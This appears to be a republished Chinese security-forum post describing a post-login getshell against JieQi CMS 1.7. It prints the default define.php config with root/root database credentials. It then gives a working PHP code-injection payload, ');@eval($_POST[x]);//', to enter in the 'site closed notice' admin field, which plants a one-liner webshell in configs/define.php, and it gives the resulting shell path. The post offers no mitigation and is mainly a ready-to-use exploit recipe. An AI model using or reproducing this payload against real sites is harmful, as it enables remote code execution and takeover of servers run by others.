杰奇cms后台Getshell
2020-04-20 18:17:03 Author: forum.90sec.com(查看原文) 阅读量:419 收藏

测试版本:1.7
插后台配置文件拿shell

配置文件原代码:

image

<?php
@define('JIEQI_URL','');
@define('JIEQI_SITE_NAME','JIEQI CMS');
@define('JIEQI_CONTACT_EMAIL','');
@define('JIEQI_MAIN_SERVER','');
@define('JIEQI_USER_ENTRY','');
@define('JIEQI_META_KEYWORDS','');
@define('JIEQI_META_DESCRIPTION','');
@define('JIEQI_META_COPYRIGHT','');
@define('JIEQI_BANNER','');
@define('JIEQI_LICENSE_KEY','');
@define('JIEQI_DB_TYPE','mysql');
@define('JIEQI_DB_CHARSET','gbk');
@define('JIEQI_DB_PREFIX','jieqi');
@define('JIEQI_DB_HOST','localhost');
@define('JIEQI_DB_USER','root');
@define('JIEQI_DB_PASS','root');
@define('JIEQI_DB_NAME','jieqicms');
@define('JIEQI_DB_PCONNECT','0');
@define('JIEQI_IS_OPEN','1');
@define('JIEQI_CLOSE_INFO','网站维护中,请稍后访问......');

后台系统定义配置界面

image

image

网站关闭提示的栏目插入一句话:

);@eval($_POST[x]);//

image

提交即可,Webshell地址:http://www.xxx.com/configs/define.php

image

image


文章来源: https://forum.90sec.com/t/topic/967/1
如有侵权请联系:admin#unsafe.sh